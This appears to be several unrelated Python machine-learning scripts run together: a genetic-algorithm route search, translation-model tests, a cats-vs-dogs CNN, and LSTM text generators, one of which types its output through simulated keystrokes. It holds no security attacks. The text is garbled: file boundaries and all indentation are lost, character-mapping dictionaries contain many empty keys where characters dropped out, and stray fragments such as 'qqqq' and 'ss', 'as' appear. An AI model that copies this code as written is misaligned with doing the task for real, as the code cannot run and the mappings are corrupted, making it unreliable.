# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
figure = plt.figure(figsize=(14, 8))
plt.title("Real time routes")
for city in route:
plt.scatter(city.x, city.y, s=70, c='b')
plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
img = numpy.array(fig2img(figure))
cv2.imshow("test", img)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def train():
cities = load_cities()
generations = 1000
popsizes = [60, 100, 140, 180]
elitesizes = [5, 15, 25, 35, 45]
mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
iteration = 0
tries = {}
for popsize in popsizes:
for elite_size in elitesizes:
for mutation_rate in mutation_rates:
iteration += 1
init_route, final_route, distance = genetic_algorithm( cities=cities,
popsize=popsize,
elite_size=elite_size,
mutation_rate=mutation_rate,
generations=generations,
plot=False,
prn=False)
progress = iteration / total_iterations
percentage = progress * 100
print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
tries[(popsize, elite_size, mutation_rate)] = distance
min_gen = min(tries.values())
reversed_tries = { v:k for k, v in tries.items() }
best_combination = reversed_tries[min_gen]
print("Best combination:", best_combination)
if __name__ == "__main__":
train()
# best parameters
# popsize elitesize mutation_rateqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
# 90 25 0.0001
# 110 10 0.001
# 130 10 0.005
# 130 20 0.001
# 150 25 0.001
import os
def load_data(path):
"""
Load dataset
"""
input_file = os.path.join(path)
with open(input_file, "r") as f:
data = f.read()
return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
if isinstance(model, Sequential):
model = model.model
assert model.input_shape == (None, *input_shape[1:]),\
'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
.format(model.output_shape, output_sequence_length, french_vocab_size)
assert len(model.loss_functions) > 0,\
'No loss function set. Apply the compile function to the model.'
assert sparse_categorical_crossentropy in model.loss_functions,\
'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_embed_model(embed_model):
input_shape = (137861, 21)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_encdec_model(encdec_model):
input_shape = (137861, 15, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_bd_model(bd_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_model_final(model_final):
input_shape = (137861, 15)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
CATEGORIES = ["Dog", "Cat"]
IMG_SIZE = 100
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
return image
# img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# return img.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
def load_model():
return tf.keras.models.load_model(f"{MODEL}.model")
def predict(img):
prediction = model.predict([prepare_image(img)])[0][0]
return int(prediction)
if __name__ == "__main__":
model = load_model()
x_test, y_test = [], []
for code, category in enumerate(CATEGORIES):
path = os.path.join(TESTING_DIR, category)
for img in tqdm(os.listdir(path), "Loading images:"):
# result = predict(os.path.join(path, img))
# if result == code:
# correct += 1
# total += 1
# testing_data.append((os.path.join(path, img), code))
x_test.append(prepare_image(os.path.join(path, img)))
y_test.append(code)
x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# random.shuffle(testing_data)
# total = 0
# correct = 0
# for img, code in testing_data:
# result = predict(img)
# if result == code:
# correct += 1
# total += 1
# accuracy = (correct/total) * 100
# print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
# print(x_test)
# print("="*50)
# print(y_test)
print(model.evaluate([x_test], y_test))
print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
data = []
for code, category in enumerate(CATEGORIES):
p = os.path.join(path, category)
for img in tqdm(os.listdir(p), desc=f"Loading {category} data: "):
img = os.path.join(p, img)
img = cv2.imread(img, cv2.IMREAD_GRAYSCALE)
data.append((img, code))
return data
def load_training_data():
return load_data(TRAINING_DIR)
def load_testing_data():
return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
return np.array(pickle.load(open("X.pickle", 'rb'))), pickle.load(open("y.pickle", 'rb'))
print("Loading data...")
X, y = load()
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 3 conv, 64 nodes per layer, 0 dense
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
optimizer="rmsprop",
metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256 # Sequences per batch
num_steps = 70 # Number of sequence steps per batch
lstm_size = 256 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.003 # Learning rate
keep_prob = 0.3 # Dropout keep probability
epochs = 20
# Print losses every N interations
print_every_n = 100
# Save every N iterations
save_every_n = 500
NUM_THREADS = 12
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
# samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
while True:
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
# return ''.join(samples)ss", "as"
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
import time
time.sleep(2)
write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
samples.append(int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
# if i == n_samples - 1 and char != " ":
# # while char != "." and char != " ":
# while char != " ":
# x[0,0] = c
# feed = {model.inputs: x,
# model.keep_prob: 1.,
# model.initial_state: new_state}
# preds, new_state = sess.run([model.prediction, model.final_state],
# feed_dict=feed)
# c = pick_top_n(preds, vocab_size)
# char = int2char[c]
# samples.append(char)
return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
for prime in ["#"*100]:
samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
print(samp, file=f)
print(samp)
print("="*50)
print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
samples = [c for c in prime]
model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
saver = train_words.tf.train.Saver()
with train_words.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_words.vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
samples.append(train_words.int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
char = train_words.int_to_vocab[c]
samples.append(char)
return ' '.join(samples)
if __name__ == "__main__":
# checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="inputs")
targets = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="targets")
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
'''
### Build the LSTM Cell
def build_cell():
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell outputs
drop_lstm = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop_lstm
# Stack up multiple LSTM layers, for deep learning
# build num_layers layers of lstm_size LSTM Cells
cell = tf.contrib.rnn.MultiRNNCell([build_cell() for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
lstm_output: List of output tensors from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# Concatenate lstm_output over axis 1 (the columns)
seq_output = tf.concat(lstm_output, axis=1)
# Reshape seq_output to a 2D tensor with lstm_size columns
x = tf.reshape(seq_output, (-1, in_size))
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
# Create the weight and bias variables here
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name="predictions")
return out, logits
def build_loss(logits, targets, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per sequence per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
def build_optimizer(loss, learning_rate, grad_clip):
''' Build optmizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
grad_clip: threshold for preventing gradient exploding
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
# (lstm_size, num_layers, batch_size, keep_prob)
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN with tf.nn.dynamic_rnn
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
# (lstm_output, in_size, out_size)
# There are lstm_size nodes in hidden layers, and the number
# of the total characters as num_classes (i.e output layer)
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
# (logits, targets, lstm_size, num_classes)
self.loss = build_loss(self.logits, self.targets, num_classes)
# (loss, learning_rate, grad_clip)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
CHECKPOINT = "checkpoints"
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2char, char2int, text = get_text(char_level=True,
files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
load=False,
lower=False,
save_index=4)
print(char2int)
encoded = np.array([char2int[c] for c in text])
print("[*] Total characters :", len(text))
print("[*] Number of classes :", len(vocab))
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
total_steps = len(encoded) // batch_size // num_steps
for e in range(14, epochs):
# Train network
cs = 0
new_state = sess.run(model.initial_state)
min_loss = np.inf
batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
total=total_steps)
for x, y in batches:
cs += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
print("Loss:", batch_loss)
saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
def calculate_time():
global time_took
global start
global total_time_took
global times_took
global avg_time_took
global time_estimated
global total_steps
time_took = perf_counter() - start
total_time_took += time_took
times_took.append(time_took)
avg_time_took = sum(times_took) / len(times_took)
time_estimated = total_steps * avg_time_took - total_time_took
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
